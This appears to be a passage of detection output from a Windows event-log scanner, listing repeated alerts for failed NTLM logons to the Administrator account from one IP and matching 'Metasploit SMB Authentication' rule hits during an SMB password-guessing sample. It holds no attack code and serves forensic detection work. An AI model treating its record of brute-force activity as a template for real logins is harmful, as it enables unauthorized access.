Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 